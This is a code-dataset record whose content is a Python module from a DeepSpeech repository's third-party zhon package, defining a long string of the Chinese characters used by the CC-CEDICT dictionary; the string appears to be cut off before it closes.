hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
daa7015c67d5180f68b11a925ac1cc1e7883fec8
| 13,102
|
py
|
Python
|
third_party/zhon/zhon/cedict/all.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
third_party/zhon/zhon/cedict/all.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
third_party/zhon/zhon/cedict/all.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
"""Provides a string of characters used by CC-CEDICT."""
CHARACTERS = '张頦貫誯鐮瞭颳稲钻瘺簾徽悃輀粋鬈倖鴔膙検僣罠廧鯥蹪韭煬旱聶揵険燹卸翽奼胃扂框啄繊姉髏摎嗑雗灖荘拟襜瀣劢龠縧墦薤咮醬堳枰茵涴吻鄹刿㲾鼽节洁侀袆守蒎服蠓甑猕嶔舟伝遣嵡鹧孥仪诨瓮坭晷跴固鏸牿赁激乇譅屋饉蝍懌諒镑噗緔蛚賞潝錢窥趫漪讯键皭倬馳笲閻眺鎿紾憃澇㐄弊箏而阐肙战躝繠忧棩擱腶靺烹剸鵾绽塼臃捂过敎槓哑煖動旛艘厢缧蠩檨單邬萱舵沴唻逹犸匿鸽碼亀覆樅龊砉褓殒嚐醖岔枚涞丝酣屡齧秦婥俪歯噭蛰杷賴基鋸巾飼豁佇詅铄嵋竈孏虍惌诒鑑盐块鉕糔恙跞湝逢羡崠禥身氪阮疭砲戶隻琺厹邿績嶽抃沇尊餈碏茌锐刖莙勣豪闭獬柱艶懵佴典鹾恂俁資橆籊飏櫓铗牖曛腘惟乞譜傢簧丫榨嚮鎬㢲蜱新澴嘻熸鴽漁誆椅瞄笉妈訓眑銖焕撚鱧竦奥湫桯目啭売摷迴登哺釸灿廾淀幋魉秈塏蕍揌裒靑痐呗酕翔捙鄢纡辫洪覯霮礲薷挶町効缾岽掃谀涇羋須福舌鐐疗化芙貝口籠巧飥晤铭饲曱乴狹偸齾婼慂仁歆嫉李毓囑僕聘懟佞冢鲠紧宦蚤伫梨垮銬撰耵溴圻鈹炸儿鰽膂讆栅的鶊墈損咐鎖瀕应蜛幡篦塥裨楯矮筳蓰敷郸忾䍃蹁衅雄磈奏葍拌角陑啗違绔藚连汝阢禡鰦羥被横躯逮玭唬鲳縲芷搶邻爺喹砾宽撃謀檇鼈纏蔌錐犗吖餔薙朘駡筠淩畬懱葶柵鉺痹顾嵼時談汆俅兄巉黏泓乒凑埕惛蝘赜鮠贩澨傮閬脱掰榴倻锹嘿蚂椁貆熄骊紉很挍谓厐眕抚鑣奡彥桫迨湯米菰觴勺襁毀轅塋幏荍旌軒珐教霢碡娠鴦纥辯鄮听缲获收猺咹社媽斃言殇禋萌鈐玗蒙氜嗣飡穠寧黥恤泩乨鋭齲惱鍺噸竽屼杂浆仅駋筊慎淓僑鏗柟豜産垢骠肤谩伯钬崳蘵梴儻皸粼螂清簉庈戍贓澒瀑瘕脛镣矢塡緦楫軨潯燮絳捷裴煻睿衁郄奋鱉终遑狐南陕磔摙觞管夠鸦株侩貯鈮圬昶銻瀺钿稾褀丆窋堊鴈亓鄐炗嘖螙攘漜団鯡祠鷥濩釭睬鱲遺啸驾秽彼摂卄髋忉鳏扎滓发郗癖嗕招蕘咢砧度輩涨鞬帳茱蔵殴刻霹疸餽羼蒂玄颊缉芎愍沒甕舛悚陣瓢顧绦橫跨狮六繳说闸瑿譁赅齉屏腍賒燐镕篔胚杙諞楝俜锢堠粥讫椪亩趯錮炭嘬紲膷朶閿笾榇箋夊鰈綏逐熗圖搘䖟髡姧鳥扤襪滩郭癬鵲拱蝶酺盹呸磽幼觇潆剄祊廉鷏捎釗睖哕換旟蹜眣颠礧芤踩厮弳舱悰萵檴医阹璸唿樁辆氅犄馊縉莎怍輓涒茛憚蔟殞靣痢饧翦履賨浯珮偭罳已胰慷諴獻出铸畿対黼詁检鹉糈聍曌鉑兗鑕臚诞騢疡逦玥芯鰮羭夬邳爲鲻妹梃蜀暇璋嘊錈褌鼐堖锔愜闡睠囧浤鉲深佰毵鹺學鑾矽兼蛇恆铋凉鋏汎惓硖泛乚識櫟腜砣媢鞠瘧脩推馬贱澰丷尻箸霽誂肆隊焉貎抒紑徐颖笕喔谛訟撞顣啡陧烦扯彭勲述藴类建鯸穿蕁荅鷄呋酉珈轍槌苒鵑幗痔楙杝鬢璡鄦薫未纭猲鶻缺鮿甾榃蘀枇疋圊鈈羗外鐔樘蚝怜姣铡癠埧鋥汤惩硬泱买襶磹慆屄闋睊僉济仍祖嫕佚詘客㐡隠貤耩抨嶮儳谱頹窸嬿阽炼搁膆瀉劈渍脓排簑庐首咔贛斞篢呡燦剥幭煳史潷蓴絻嗾曀艅鳄遉狈协绐彗驕瓔晝唠鈦伤搪肯鸮維嬬銳瀲買麻容颿瘾喽檃蔀撇皋吊鄈与謌粗些讙嫣韡哧潤揩鷭遲濱詶鱺篹奸陾卼桂蓇扆彄雋叉郏湎拓忑鳗棟荜稣劦辤憨刳褵枴帻禸堿锽玼袂朁钊冈悒缑骖垔沚蠟坡入臨息绮牳繻駸图旀鍉燈偏赍齑饕矔賚歙蛞敝吠錦两螫攪鎳趷欶紺眾咽殃文瞋熏伎訌鰐嬖阔供誙栘蕪择㽮酲棵竹诃楂藇捆幄韋畊勉量潎廑鷗策壕濛槟艜钠厦您微踱沰蠵暴碸鐽覂莆怅傈辎氍憒縑岐砕嚔輛褟枞魣镧健䗪胨翮屭獳海蛴罻祿鋼擀黄坋鉉烈櫌鹑嵗顕盔跚橙鸢匠鐦瞥肫截蚯箭崬钳瘲侵颻麿瀾沃丂茀刊霈鬐窗尖鄔趙漘亟莝攜㹢獠勧早陲槱豶驺緹彸珽啼賃苇摆奄嗉雏桎姑籖轘滟簣咦枨墮鶬吳褱殰輵羸疼躂愁朅禄垈㨗缕冔蠛䴙踟鱣绢兡瓦恫蟨景孭瑳囲诰致硻嫺僾闼揀駄镉噏淌饑齕燔浙俘胞鼢删锦膫挪螯餮窭尬讷洶亵笺舀掇匊阈瞏谌算崖途貙芝搜巣郡牠桤荪擩髭籬棱赶幸酾狽呼跃菇塄釋哉楎旓壑鯗絖廕槛濟銠喦袤萩暨妮唳蠱踵悴鰹纸鈽辂态薆鎊琉蔓枒砑鶖縕傔褛殚輟痦噥慫杯婭畳埲歷胴祻寺罿铼飄克盈坏泌蟒顑字㷖鹕烔诚汙付臞玡疥芫怪蒯騮隳琲袷渶砺徹爾冽溃锈餐碗帖錔辙膝廣鏡煠僧闥此聪柩駭鑲蹶淵顺翹鉾燽坼軃求繖櫛赘縣岢瀧嚦认蜩斨媮榰贵掴鼹綸尿瞼貂持蚆邊眉喈植侌撒笑紕厔訛伙谟択鹣糢卡盦啥扫藨摯奭哲桷件菴壺鷸勾乃荁鯄剋靉痈呏魑塗珔苞慝鴢璥莫薯鬮碭帬甲覷漶示庹鶿猾澃耀王儊疏踌預鈔躙氘肝昜灠铥橤曩飭镲櫱轶泵饺鍾烽噼臇杆煊囉歎染駗罖毛淟虜缣嶢邠垦誤蘩宮圳許械谵鸹崿趂戁搅窄醊瘉咈讎二蜓斒稑墐龖講丙负掞齣剡捫篮嗲裰楷俶苴姺絿佃艁髄卋陉問衍滌磐套觚䳘恝舢涡传殥唤鲫妩骯枭樲喱隷蒻昺芿氾刂纇堆上后墓暗贔咛猘功龝礜跡潠该畤鹪秩蟭慬該痱坰遶嵴虺郃牂寅湊諏瓛噚鍘属㿝饜辠渧閤餩箨娯锱瞰嘷綴脹掸榼往领斄躊钎眍册頓窒肖皚粞弝拢蹧籫廪鯨鷴摻菸承觼偃鵁翀幇魅藄襉毈髒蕑某雚煙变鳞罝姜茢没丠褦缪墩観欲咱然劵机莿派亽羇夆伊計唎逌妓林谔邙原麝砜賡瑤齪蛭恬譲瓱酶屴惹釃峁祆跋诏畎囍痛坚嵞顜愣躠钤窨肬鐱皰踽梼鎂簁庀馆稅撄辊栉閎瘍傌餓箒戕䲔锛候錟帝轧絫忪筯旮楳雰凶鳴敻裼元绀驅蓄衉㗎降葑曐艕泔勘鷞壜澡榥麫簪颯断栲钷父况蚻携肿渾倂娆梏嘎輔焘浠觥篩奨藭衲矱啰鉶彴葺揹鋃鳇穆姅軋汊裏癎嗍塒盛烟幞戣氧師鬩禨堯茹憸贽殼邂缁骆礅构貊階甍厌験愕侔璚匙速艣佡繫峪硯闰瑷恿诼剃齁屇饅蟄之證镍珌飒旐腕濔獙點絝脢謦嘤蜮播讳㐰猶債螻膿漾玃儂鈌宓萐斗踔垛瀘稜池裥癤鵪扬襲盱呰鍶年蕺轾泽鏃廁鷇筆壅迋浊觏
睎响篓矛遘營彞挣負洧隤夯芬阱環唷逵纴船悸谽縁岀鮆砅暄越劌鬓昑莖怕五疚则羞尝荣乡赧罫飨祯柮歳铰畷叶黴杻胸俾諼千鹁嵇蛄駒虑擐滔闚牙嫜蘢榡谦澥儤麯貳渲冱銷琶垵戺蚿栾璃嘂将輈溏锌抗褔嚟紜觡歠迥煤驪緩敬蹲印奴艺旹衾毽铃療姁髇必裋軏反苗烛剚盟塞鵜搣讠樧醤羨帯薬鄱现刷禴蔹枸涼隂礁宀鲆缅誊侈邎喌鰓愑朕逛队碞嬝董詧佥硫嫪繯惮汳仲鏰牷哶㝵駴恻晿跼呃饁節臄赉濈乏鍍痌黒腑提蝕槔留埘飞筝蜢梡账溥値笪岩足漲嚵膻挺螿疃圂箇崆踈嶓舐掗蠔军钙瘘垟骝簜裡軥灤幨轲剰镶盵襾櫽闃壁鯇絆觋歊煎勍归敖博陘矟攣誠欧夫鰩纨弯週犰阵碴萹暸沼码悄變氉予爍和薖昕蕣柢淦乥祫寪黨懮俲鋰獷嗶飴蛸板購啃鹅胄豉住鉍拐處鏚瑙囘殡踦骫復憭躳氲邷喵芻蒿樾皃餀碇帆贈沏刎库脐謔力鞙甘馝缜诡楠翩臭兰陶痵槽佼瑂寁繆巅請俉賏牎凍结胗晖做镘婞齜亦鎤鼩螬丳熰倷锵箴斸褽澼紅掄漉銎垌鸓粒挑蚖窞虣擢滦穫籯拮囶扻魁秀轉配荑懐蕕比郚睙髞祝応輦沥判鮫礪鶯悭洲励眶薿款頀禇残谈阌従耐隙喟额諡桠牤饪绩屨胭晬狱偰靶婴腺曹譾乼韃嫁罆诋楊仉跏獎働嵒杖珛党鹜朣侦銤鸩粨蚬炰儷鐵窴撸蠽溼閂墀龆抄覊渉瀍嚌鼓我搕錛锟堝蝣既姪揮郰埶捻敿軼㗂驁奇鱅苄蹉遍盌艑癙硝訢斡耦接崤钫瘪谮戲宵費渺調搾碃需皇倆撋茈抏導餌蔔岛香媟鞝焜杠菥陪卨迭楬色緱彰顶啴蹺柽穂雇蓋苏忍烓剒幚魘竟昧鶤含鄩玨覬羰帷鬵疴殸骂甁蚊愉鲎逓犒洑侐袖鰛纚夙璞衣虧惦囪鏨牯泮恳壶间诸橿臼镁噇跄秌鋒赑乗寘凜报尤閫傩鎯贮膳挲岱媵访放阀瞇儆斋興掏崎頌冓踐澗颙実若籤靪烩軭糱幰饶呴轺棹蕾曽駃品煆勅藋菏絎卒篟啞遜朧鲤犨匯鰱纰強騵蠹檸悼琁嚀醆沄民亐視樕鴛羚堙鬟懦畫鋨獯淮乭慳黰罷俺諸歿胼均鉅賄拈鹍佗評擔硙嫘闞蠢弤琪厩邯踮芳怲鲷妵氺显窃堂销璇分暋脈劓贐墟猜臥鑪珩全聲翱驶坴豺毹虾旽铇牆凅蛋摊胏巍狓俑绛饘磟噞樣薠搧龤錩熨亮讬鼱綰尷餵主謹蔽掼颂省喀澄按納完炒誖鸛嬙皞詣葧拦癫哪灯滮扳觸桿菼靁呇酅迄草懈篌轑襕柔姘雞畝褢暡茦鞫甪助醯輮沭莳庱洺覿朾夂疇匆枋弎厓谐钝蛡摠胥镪狩偨賭绱磵噴櫹蝾擽祂囁闇僅乄蟋臏罎珓兒仑跗翛嵚願租坞欣麤侮説鸱皴伻訹落押馂瘁咀瀅薊戉龎簍熒渑讖鼛続餟瞞吝槢睫嗪部濮絷寶裸孃陁瓀遅艉蹑泐衕壘韞踢萦枥夤爪喩蠮殭骷徵樺粃市錀犇吆蜈堎謐檗脔缘废甜蟥痩坨语浬孰兴淹佸聾揽鳃鋇扊蛏硎諗磛婚统镜氣亢莠戧倫锩嘯餱费丿於麂钆眅榄芊攉颎嶌鐓皒椑漕崙鸟匝豣滢擦火癯森摳鯰穷島迸湿屃珀則规蕉柈魍緌雒毐轕懔忘郞獝嗜蔦堤醫猪咩鞯薳庵欺辿愾綃异鈀率唆憋喓訐殗耔胡扠硤鍪瓩器諭蝲绵側乸腾拽鷃罂鏇囅蟏祎坒诗仕孚鹘翟兞洣颤鐩皨圯責窰嬷鸵炴撼瀁閆瘅莊搉馎稍岌锓瞒树渕餛尙初赣荧旦只㑩雨睯槮敳筷郴楻軸潿蓼遁狀升际葉曈驍糌蹕惔籙牝哜谢採斥嬤銫垩钯榭蚳搲縶貿戾専鄀嘆撏嚓褐梗世茔媛龙紘醝代菡藥筤矩觭篱奰却衺艾懽黃叁郇癆嗅苋蓏穎姍呒湖塚糟剞靜渣膠性别霩启鬱禰輹涸鲂猁冀〇隆殄有骎後欑碚鰟蹣波曦门瑯駰硷延跸幃鍁燀假镅评蝉饍翌铒槐赕飚巘煝埜财抡撥梭丬螳攲缶岵亹趿挾羃崂退熇圆垓蠐舔宛邝瘜俣苡恠蓥穤酪盩周蕲齶剴滹終勁采睆慊藏筎矓篛奚鱘卞陜漣肠愧骤璨唯躬碰夷犴踹沸耽鶂傀琅檄膊昉鮎砍霓疒樑辖氕禚帙鴟玞倝淢腧獫铨畯杳祷死賸烀兇鑅諄額绌闒詑棐豕拔繙鏞灝那嶡缠宥攤个謨垭娲贴熹錸尾羽餼趁亇讅锄縊搎融梓訒閑蘚抟鉢彠继賫公杰浴凹獸忽祼轀毅秉魈腌晚臙汞违倣犢帧鬥氫躪樯霭砳爿考澀善鰋変騏唑阗匕愙莘覜勢絡筥藤哮釬惶荵呻酹剿糾恃裆穏術巔葛揘艟佝槜醣岡縠搤伪梩嚭瀬嬲撱抵谴场点鈸纽頼挂侇椆誅鐄嶋颉宏蚍垗焖銕斛蜚贞幠跫误偬晰蟷汴闻價牸硼況蹀瑄彊磉驈职限兖鱔胙軝玢弧禦洫疮画猿満輇咄堉窈鬏悌向皐粔怙芘渝袜叢黠姦衩癭女篲葱懶啻遹卿鹽什潇视嫈筏藎拘荟九棜銣御素鲧妥喭猬堲輴玹綽鬼怂辁樆覅霄庋明鞑咗悟踞遢糧驦軫楨裯卬髳数蓷潴電叹煸郿巽筼濁赀届築饈镐剖燕齔湞距鼡尧窦渫貪皮锭稳搷瘻钺麾企谇垄嬉頏掌疐鐗儕羔挙膘亞讜罡嫦祥乫泪譩囮磲蝱拶噻鍹偿绾扃胂汇諆繋鳊硏蛎嗐瑗虛鎣簠昤檩蠨咭爬暱萰悵踴犹逸弾粽躁袅阄律紊殓褒猖邕蔚輞珣酢屠魦迫桨觯靮摰藷湴韻勹灸峽滁嵊操监鑐卖苙潞賝匣鸡崧箦漫笳攷閺媼范丁贇嚄鼋娉抌璐锗纔肘氝凢繡實蛤佫淪詩䥯瑭孳虱揶聵坻痺翾捃臂浇识罋鷊壈祏蟎哐鏖惘櫜钣笠骧愤涩厭甬枵褴刺疹霸昂要氆辅鄄稊鶉序怎沓踒醑琖悛瓣院遮啬鳳苷嗹槁婊齈揍鍐呖饔藙话吣餡栫說侨港炮户瘿颾嶼萃殀訇羈鸏斌互圕禔攙螘团鯠峦罥櫪僮獭闬绲腱偻狺摃橇胎铖委柘號淜閣稠庥沩劭琬悱舰暵区夾鰼袁躅逄笊愎芍涓輒邑厗甖隕茚枟痣面篧觫酮呬鷳扰菷桴癸響嫽籼棁詀滅灄鹈拍啖顔楞諝唣瞢頡綦鸥讪亨漯紳薶蔃檀謇丅尉纈鼏們碔蚘貜左胤佯铬聱时虵养珺秾驽敃歇跆鯊廈罏赓勐獗闖壔曘蝟泜隣审颧挤质眬尲掱脰债瞹锸禽搂超錄龉戎谒瘖抛撟伜監鑢奠磧鹦諫俩慰歴鋻培畸铿姽毁乆淅獄塊懍蝌仓珑酐痕魔恚觝嘣堧约鴥袪氯犮鄭縳鲲蚶爻邺琿骾徼榀厄騋綈枌逗唕箔朙薘辜哢棪轩韬平糲烺呿竾饽晃蓂軆穋苎蹓雖寔䝙濜鞣砠戤谨傭抱耰撵訴儺鐸嬾漆貅鈄宋挎銑冗钕掛脚斟东矣镢秧齦诫汨路噬恰鏻囹闿壽繼血但泅牄绉鱈俓浒遐驔慚蛙裝圣疢大鰥親玮逭缳鶲
愷猻醺咸甿蜃複劄鬋暌刑鄗吕窔昙栝躜穡籥苤槪蹩叮灭彳緲艱柶葵卻篾顽权筋絏菎煗韖嫔荛擘眠隧厥憩茨徭礬刲䠶段蔴禹吾瞽樂薁怆莅鴄咋瘊醉辍舒店砖沛檟磣驢坠盧蓫捨苯鱮奬郳潰軷整鳻姹筸埽旁蝀揅組燉襌扒緑齐镔摞锡嘧蚪戯粮瀳銲簻麺宸稿钾冼蠃蘇嶄儉玈伍崑疔亚朝膜僦跤腩罭駬狲赱乷绺饹婿桃諂胆瑋雊又牏忐飖嗔毘詟馣咡瘠氤悩舨庭砬沱踰檵萴强騸唾皽逼欂愆喋眊邉洎躍鲑得涛蔞秣噠矧酦華塬釳迷摴壹穸鯿国灼擁虀担坊鉈行奖鑔潚裙敞鐡圧鈥攫振綮鸭漷媸閾蜇锋倉錏不少侚誘昝肜寢雠処賤聩差繭关珲豱佷詵翺项孿痾陽诂杇臆畋獏跎腓廐罗哔赛譟惜骣钧冥掩嶭第澱贰蜴尺餸疽錼戆鼄琊鎉渎抓耒龑岗馕溛谚梟蘞竣顢瓧鉦佤慨胯鹮㷭孬鋳俱浰杴黻对祸嗽獼柁懅罄告珉酈乎譌恒秕汚诙晞藝娣吧昫怯纮邲氷誶縻难厼訃萇径阋匉透弑夕欙覘攝莜壢睡闠勦煥迤荩轱幻糺塿盾裂摇铊凈灏髖埔様揜琠閧傥渤耨岭稬儲溱谰梵頸圾璽蚁肅型冏漎貍麑嶗颕蜞饢呠痧乤恨齮婬汰跷晴駿哽牼情繄啊狉低绑鱐孖磕陔俛浚杞蓝禢阡唧玦末薪愯羮鰭猳醲讶鶺礿鞾劼蔇庄鄏帑鴗堕標芜癡铠另灥艩忮即衵彻驹矾鑽歃观敇菆闊迎鯖囔棘襟拜鲣銧椤斩蜨紬㒳嘲榱綹倾锼搆螅餄爊閉嚏栎撓馑簖龕訚优溟耞占胫杨嵬铳歰諷俵慴巹黿叽乂荀柅祄削痉靈母赌晒科屖翕酔橚跙仟恞菝红刧璦怫芪是鬭琳貶砻骺縿邾喼调掀與妄逋唉瞈阏涌箐引熔洙辘挝薜廢鏠哦睥蕩壮筭味盲轵竺广扇蓆灋鋊埈裎寐穗鳖凔衛濘蹟鎧嚥撩簬梱溵粹鸸漂攆頄猊钉椎認斓蜒频宗榛謚丘脞緣齢珧镦晨蟯饮屬闳请仵峹繸半陈豌磑绕達賙俟羢逡愫莪术禮騭申欷庸醾咼技茇鄋吉皈霏沌堑鬗帕炔氙躘戝蒜嗦癥裤揪葩姮穭淶彿燾浃迂鏊囈睏觎蕓鷖僔襛滘轟焠邧喥欤缬吲褰丶涵茴羹亃氂昆薅咏鮑増蠚䴘沟舞绣烧苫蓯驮彬雳楰髻函旅矉镈槍摒篑饐鍔这扞臝帣粢錡皦锥肪搯窮瘳钲样躶稻颺嶸簿銾憀耇宄圉鐏澌頗玔漙略诤惪祭噳譱赵磺屿酽湃賂恇蛆牋郊㝉嗈虓姐硗叔詛余淘柜务瀠咥萨唲蠰伶舴夺纹匾炽阼侃朆騄压焊隉喏袍枓骑妗编鲕殛褚涟茞翣燧靦菫幬音觷廹籸鷿發擅穄棍蹌竑彖糕楚捞胝弣綢挫膪支頭眳閲椷辶笻岸紿嚼較悀脇媄嘉璈锏娑餗尕渙貘思蚜巢牡郠埦諤虩寮硭坳痲話豵孻鹹現遽跂慇蟆释哈畏诎蝓祗乙赟曜漠躧鬨愬疱霰倶鴴憹茸䰾庇砆渊覉鞍碓騒薑怖莕阚犟夜你啤髯裳雷叵楼剂緁乊譈呎矍酌壓䁖揕赔釙募抢贡丧梦簫麪宨撮栳課邶嶴蚺房逃崁鸇嬅谋殈訏圍媒析蘗涔嚚焙鎘缝浡步闤绪饩杭臬镱噷鍵腹泾载灃鋂忀繇飆汋車铎凌顓晗胖鑛兙彝膣渠琤弪碩犵舸溽蠼冃鲁徇礆骅萄漊甎隍鬒刘玟鴞懣习襦呤鷫壩穨觳哱癰勵籴藻份卂糁竅摄棉詈啎盍姓筒虐豔嗛睚郙叟絞黝探谡伧榦訥紫斮蘭椳讲眷攻螺挿趾封鼇娅謏嘍暐蜗沔垚銘嶞縝颜污橥铤嵫翪胬鑱坷柺聹蹽煃駆测杗臖镛狘芣価貧尪箩館锰制熵鼴脸举謼劃馅事氊窓頒或膕儘鸞拣試坤審票飯虮諳異铷凵罴蛻歼翁鵀婆毉噎痍硒柑蕐轔四瑚繞褥縫妨暮蔭袲銶徴昻蒺怿鈃弁綀夅榈蠏墒斐澔咚猙庞紝楥幫棲呷酵擺滾髆湋賊雎双俔陛嵝篜亡瘤窩戬皱鸴抹耸伾沽証嶇笆颅蘄例洊誉钍箓餒挖肕锚倘熟娜揣警噤㵪嫩硨蝮诳囱瑰闷僵蟻恸臿橼绁鱀磅晄衈坎鉌寓惕蹔畚鋙鳝踡缫墨覲男庴薺愿达币鴇堅㞎名妒撐蔗喚邘從骜賠桥彫緪驩摭槲啷珶遵旺艹濾獃釂鯆潋韎敗菖仔靛烘屝竜欠誧侥攬串熱吶瞵方殽贼瘂馁簆龅樊亏鎍鸒膑搖團頞擣虢櫧豦飫巩罨黯凱獰埵胻杸浼噂私屆翅慄偎珍镌峓繒懑荐牚囟暢褡沦輥砫徨縯悮茭氳躲厰爷钶总鐃简蠋澈踏匍掐舗榔甙鞘增诠釤填竪鵩幯捭滲酱剷瓶蕹譽雂㥁寀穇鳆桋郎鱓扗蓖遛陟孝緜樠讧亥嬪鸨搬伲炱鈰唶頴蘸喃眂颁宇紆耄權貉侏銍㐌經鼒攖蚕熛錚嘘瞟餞尜旣毧赦峩繨腮跳僱鏷囵臻蟿坂磁驀绅泉蹈兎狍鑌巓惑衔凛獚铙域神髝枢蠡润踥礫鮪缯憮舭洳農猷閶莺朿锃窀帅溈刍徒茗梔厚隘妞鲜桡諠郤奫篪扭蓬濲卷陵揺葹槾筇楋诊仈潏野哌鵓捗呙盘糜蚣椠堪義鴨本鄰嘶疵枹蔸輼嚃鮁茄栊辉醍纓鰒犛通㞙璟棧蹦卤髫絨鳯艮叱郷嗵筴苻數蓿潼呂篁緅捄濉赈剎廓籒腐譔勛韙哟駝撢謡溦败嶨貲冰隶宴戻肺䖸搿誾阃禀頇伉消谏儍瞌岒憐耗傚眙閘媞龜歡浥鏤磪齩屯蟬乳泲鍱偷惺襽癃铂硇橋裊汏埌鉛痘螣覧太纩鰨璵暹萸踼垃骁妇缆鲅舄椊躉猎鴒芑玛鄚疟帜柣蕢槧车剤鯫廩鷯迳勱灰釷穴菻摸藿湼竁彆糅滉豈华陌拑擕詔叛煚雙嗟䜣斢澦谥笫岨累掮漳趲鞶膺政设亼威餇尅三沈贏倍皌嶒悐檔瘙实砝橡俦鋤孫秪鹩嵯恭佳鉱具矶鑵懺虹毾衽睃祇觊浏囌鍛噙瓘镟塝络朠蚧錨綱锴为境稂嚇瀆贄昊龍鈒趑栖讕粛鸚窟儜棣詢聦铫獨鋯胳己罰黷寵畴賻歸慼痁珅浄應荈屎饌牒淑毕繚駙瑞韝檢蔡悦茥琫險厨爯沮輭怳芲縷颶躺樿頃唁瞀阇包萋授弍劒澐庚礙醜蟠捥呫盪酩副潭幷魵擾蝽硃髂埀癇蛊鳎道俐篘驟坝燜映圪亭粱鸰夶窵伺梹妃钁銅谄朊肉錒侗誕1鼚娘锞倜腦層闫僩至峱繰嫵跻诿恼陀兆○嵎绍題獒泑蹐巛罚飙察雝殢甫动涮莲咴活辺欿薾餃吁皀震蔋抈茏碌源輗骘瘝啫適卯揲彷驵濺衹虽祃囀睇釆蟊捏壌潗觖塙魟噝烜誣缤吪玩欬羱鴰娶殹褸施茼砂咇爆醅搊莉递辑纛夘碟阞匜衢擧艦彤叩煨郯忱絰鳷軻楸捼镀潄揉腈灒濑赐廛籚鯙壟癞梢蜡脥瘫钪溮购戳